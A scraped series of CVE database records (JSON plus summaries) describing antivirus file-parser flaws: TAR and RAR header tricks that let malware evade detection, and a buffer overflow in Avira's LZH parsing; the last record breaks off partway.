The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://www.securityfocus.com/archive/1/522005mailing-list, x_refsource_BUGTRAQ
http://osvdb.org/80403vdb-entry, x_refsource_OSVDB
http://osvdb.org/80389vdb-entry, x_refsource_OSVDB
http://osvdb.org/80391vdb-entry, x_refsource_OSVDB
http://osvdb.org/80409vdb-entry, x_refsource_OSVDB
http://osvdb.org/80396vdb-entry, x_refsource_OSVDB
http://osvdb.org/80392vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.htmlx_refsource_MISC
http://osvdb.org/80395vdb-entry, x_refsource_OSVDB
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T18:53:37.370Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2012-08-13T09:00:00",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1425",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1425",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T18:53:37.370Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1443
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.
References
http://osvdb.org/80472vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/522005mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/52612vdb-entry, x_refsource_BID
http://osvdb.org/80467vdb-entry, x_refsource_OSVDB
http://osvdb.org/80461vdb-entry, x_refsource_OSVDB
http://osvdb.org/80470vdb-entry, x_refsource_OSVDB
http://osvdb.org/80460vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.htmlx_refsource_MISC
http://osvdb.org/80468vdb-entry, x_refsource_OSVDB
http://osvdb.org/80456vdb-entry, x_refsource_OSVDB
http://osvdb.org/80457vdb-entry, x_refsource_OSVDB
http://osvdb.org/80458vdb-entry, x_refsource_OSVDB
http://osvdb.org/80454vdb-entry, x_refsource_OSVDB
http://osvdb.org/80455vdb-entry, x_refsource_OSVDB
http://osvdb.org/80459vdb-entry, x_refsource_OSVDB
http://osvdb.org/80469vdb-entry, x_refsource_OSVDB
http://osvdb.org/80471vdb-entry, x_refsource_OSVDB
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:00.328Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "80472",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80472",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "52612",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52612",
               },
               {
                  name: "80467",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80467",
               },
               {
                  name: "80461",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80461",
               },
               {
                  name: "80470",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80470",
               },
               {
                  name: "80460",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80460",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80468",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80468",
               },
               {
                  name: "80456",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80456",
               },
               {
                  name: "80457",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80457",
               },
               {
                  name: "80458",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80458",
               },
               {
                  name: "80454",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80454",
               },
               {
                  name: "80455",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80455",
               },
               {
                  name: "80459",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80459",
               },
               {
                  name: "80469",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80469",
               },
               {
                  name: "80471",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80471",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2012-07-28T09:00:00",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "80472",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80472",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "52612",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52612",
            },
            {
               name: "80467",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80467",
            },
            {
               name: "80461",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80461",
            },
            {
               name: "80470",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80470",
            },
            {
               name: "80460",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80460",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80468",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80468",
            },
            {
               name: "80456",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80456",
            },
            {
               name: "80457",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80457",
            },
            {
               name: "80458",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80458",
            },
            {
               name: "80454",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80454",
            },
            {
               name: "80455",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80455",
            },
            {
               name: "80459",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80459",
            },
            {
               name: "80469",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80469",
            },
            {
               name: "80471",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80471",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1443",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "80472",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80472",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "52612",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52612",
                  },
                  {
                     name: "80467",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80467",
                  },
                  {
                     name: "80461",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80461",
                  },
                  {
                     name: "80470",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80470",
                  },
                  {
                     name: "80460",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80460",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80468",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80468",
                  },
                  {
                     name: "80456",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80456",
                  },
                  {
                     name: "80457",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80457",
                  },
                  {
                     name: "80458",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80458",
                  },
                  {
                     name: "80454",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80454",
                  },
                  {
                     name: "80455",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80455",
                  },
                  {
                     name: "80459",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80459",
                  },
                  {
                     name: "80469",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80469",
                  },
                  {
                     name: "80471",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80471",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1443",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:00.328Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-2974
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an "integer cast around."
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.858Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
               },
               {
                  name: "36712",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36712",
               },
               {
                  name: "2764",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SREASON",
                     "x_transferred",
                  ],
                  url: "http://securityreason.com/securityalert/2764",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
               },
               {
                  name: "avira-antivir-lzh-bo(34551)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
               },
               {
                  name: "1018131",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://securitytracker.com/id?1018131",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
            },
            {
               name: "36712",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36712",
            },
            {
               name: "2764",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SREASON",
               ],
               url: "http://securityreason.com/securityalert/2764",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
            },
            {
               name: "avira-antivir-lzh-bo(34551)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
            },
            {
               name: "1018131",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
